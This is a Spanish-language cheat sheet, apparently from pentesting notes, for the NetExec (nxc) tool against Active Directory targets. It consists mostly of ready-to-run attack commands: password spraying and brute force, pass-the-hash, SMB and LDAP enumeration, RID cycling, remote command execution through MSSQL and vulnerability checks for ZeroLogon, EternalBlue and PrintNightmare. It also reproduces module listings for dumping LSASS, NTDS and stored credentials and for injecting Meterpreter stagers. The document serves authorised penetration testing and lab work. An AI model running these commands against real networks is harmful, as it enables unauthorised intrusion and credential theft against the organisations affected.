NetExec (también conocido como nxc) es una herramienta de explotación de servicios de red que ayuda a automatizar la evaluación de la seguridad de redes de gran tamaño. Se basa en CrackMapExec, lo que hace que la herramienta sea fácil de usar.
Installation
En Kali Linux la herramienta se puede instalar simplemente a través del siguiente comando.
En caso de disponer de otra distribución, podemos revisar la página oficial de NetExec.
Verificar credenciales válidas de un usuario autenticándose mediante LDAP.
Password Spraying and Brute Force
Checking Access on WinRM
SMB Enumeration
RID Cycling Attack to obtain domain usernames
SMB logged on users
SMB active sessions
SMB download file
SMB Execute Command
Dumping Hashes
Dumping SAM
Dumping LSASS
Dumping NTDS.dit
Kerberos Attacks
A través de nxc podemos efectuar los siguientes ataques en el protocolo de Kerberos.
AS-REP Roast Attack
Para un único usuario.
Para un listado de usuarios.
Kerberoasting Attack
Change User Password
Change Password of the Current User
Podemos modificar la contraseña del usuario actual (NEWPASS) o modificar su hash NTLM (NEWNTHASH).
Modificar contraseña del usuario actual.
Modificar hash NTLM del usuario actual.
Modificar contraseña del usuario actual.
Modificar hash NTLM del usuario actual.
Modificar contraseña del usuario actual.
Modificar hash NTLM del usuario actual.
Change Password of a different User
Podemos modificar la contraseña de otro usuario el cual tengamos los permisos suficientes (GenericAll o ForceChangePassword) a través de (NEWPASS) o modificar su hash NTLM (NEWNTHASH).
Modificar contraseña de otro usuario.
Modificar hash NTLM de otro usuario.
Modificar contraseña de otro usuario.
Modificar hash NTLM de otro usuario.
Modificar contraseña de otro usuario.
Modificar hash NTLM de otro usuario.
LDAP Enumeration
BloodHound
Si disponemos credenciales, podemos usar nxc para obtener archivos zip o .json para BloodHound.
Read GMSA Password
Read LAPS Password
Enumerate Users and Groups
Enumerar todos los usuarios del AD.
Enumerar solamente los usuarios que se encuentren activo en el AD.
# Autenticación básica para comprobar credenciales válidas con autenticación NTLM.
nxc ldap 10.10.10.10 -u 'user' -p 'password'
# Autenticación para comprobar credenciales válidas con autenticación Kerberos.
nxc ldap dc.domain.htb -u 'user' -p 'password' -k
# Autenticación para comprobar ticket (.ccache) de Kerberos es válido
nxc ldap dc.domain.htb --use-kcache
# Autenticación realizando PassTheHash para verificar si el hash NT es válido.
nxc ldap 10.10.10.10 -u 'user' -H '<NTLM_HASH>'
# Brute Force sobre un usuario para probar un listado de contraseñas.
nxc smb 10.10.10.10 -u 'user' -p passwords.txt --continue-on-success
# Password Spraying con una contraseña sobre un listado de usuarios.
nxc smb 10.10.10.10 -u users.txt -p 'Password01!' --continue-on-success
# Password Spraying sin BruteForce, probar 1 línea de users con 1 línea de passwords, succesivamente.
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
# Ataque de fuerza bruta con un listado de usuarios y contraseñas.
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
# Verificar si el usuario tiene permisos para conectarse mediante WinRM - EvilWinRM
nxc winrm 10.10.10.10 -u 'user' -p 'password'
# Ejemplo en caso de que SI dispusiéramos de acceso.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [+] Gzzcoo\user:password (Pwn3d!)
# Ejemplo en caso de que NO dispusiéramos de acceso.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [-] Gzzcoo\user:password
# Enumerar recursos compartidos del SMB que disponemos de permisos.
nxc smb 10.10.10.10 -u 'user' -p 'password' --shares
# Crear un JSON de la estructura de los recursos del SMB para ver dónde hay archivos interesantes.
nxc smb 10.10.10.10 -u 'user' -p 'password' -M spider_plus
# Enumeración completa desde SMB.
nxc smb 10.10.10.10 -u 'user' -p 'password' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
# Obtener usuarios del dominio a través de RID Cycling Attack si el IPC$ está habilitado
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute
# Obtener solamente el listado de usuarios al realizar RID Cycling Attack
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute | grep SidTypeUser | rev | awk '{print $2}' | rev | awk '{print $2}' FS='\\'
# Verificar autenticación al FTP, en este caso, comprobar usuario anonymous si es válido
nxc ftp 10.10.10.10 -u 'anonymous' -p ''
# Listar el contenido del servidor FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls '<Directorio>'
# Descargar archivo que se encuentra en el FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --get '<PATH_OF_TARGET_FILE>'
# Subir archivo al servidor FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --put '<path_local_file>' '<destination_path_file>'
# Si el SMB se encuentra expuesto
nxc mssql 10.10.10.10 -u 'user' -p 'password'
# Si el SMB no se encuentra expuesto, hay que añadir -d domain
nxc mssql 10.10.10.10 -u 'user' -p 'password' -d dominio.htb
# Autenticación con credenciales de MSSQL y no de Windows
nxc mssql 10.10.10.10 -u 'user' -p 'password' --local-auth
# En caso de que MSSQL se encuentre en otro puerto, hay que especificarlo con --port
nxc mssql 10.10.10.10 -u 'user' -p 'password' --port 1234
# Ejecutar QUERYS desde nxc
nxc mssql 10.10.10.10 -u 'user' -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'
# Ejecutar comandos arbitrarios en el sistema para obtener Remote Code Execution (RCE)
nxc mssql 10.10.10.10 -u 'user' -p 'password' -x whoami
# Verificar si el equipo es vulnerable a ZeroLogon (CVE-2020-1472)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M zerologon
# Verificar si el equipo es vulnerable a EternalBlue MS17-010 (CVE-2017-0144)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M ms17-010
# Verificar si el equipo es vulnerable a PrintNightmare (CVE-2021-1675)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M printnightmare
# Verificar si el equipo es vulnerable a SMBGhost (CVE-2020-0796)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M smbghost
# Verificar si el equipo es vulnerable a noPAC (CVE-2021-42278 && CVE-2021-42287)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M nopac
❯ nxc smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] coerce_plus Module to check if the Target is vulnerable to any coerce vulns. Set LISTENER IP for coercion.
[*] dfscoerce [REMOVED] Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam [REMOVED] Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug [REMOVED] Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce [REMOVED] Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] smbghost Module to check for the SMB dialect 3.1.1 and compression capability of the host, which is an indicator for the SMBGhost vulnerability (CVE-2020-0796).
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using BH to find local admins
[*] hyperv-host Performs a registry query on the VM to lookup its HyperV Host
[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] masky Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mobaxterm Remotely dump MobaXterm credentials via RemoteRegistry or NTUSER.dat export
[*] mremoteng Dump mRemoteNG Passwords in AppData and in Desktop / Documents folders (digging recursively in them)
[*] msol Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)
[*] pi Run command as logged on users via Process Injection
[*] powershell_history Extracts PowerShell history for all users and looks for sensitive commands.
[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
[*] putty Query the registry for users who saved ssh private keys in PuTTY. Download the private keys if found.
[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] reg-winlogon Collect autologon credential stored in the registry
[*] runasppl Check if the registry value RunAsPPL is set or not
[*] schtask_as Remotely execute a scheduled task as a logged on user
[*] security-questions Gets security questions and answers for users on computer
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL Database
[*] vnc Loot Passwords from VNC server and client configurations
[*] wcc Check various security configuration items on Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.
❯ nxc wmi -L
LOW PRIVILEGE MODULES
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] spooler Detect if print spooler is enabled or not
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_netconnections Uses WMI to query network connections.
[*] rdp Enables/Disables RDP
❯ nxc mssql -L
LOW PRIVILEGE MODULES
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection Pings a host
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
❯ nxc ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pre2k Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] sccm Find a SCCM infrastructure in the Active Directory
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
HIGH PRIVILEGE MODULES (requires admin privs)
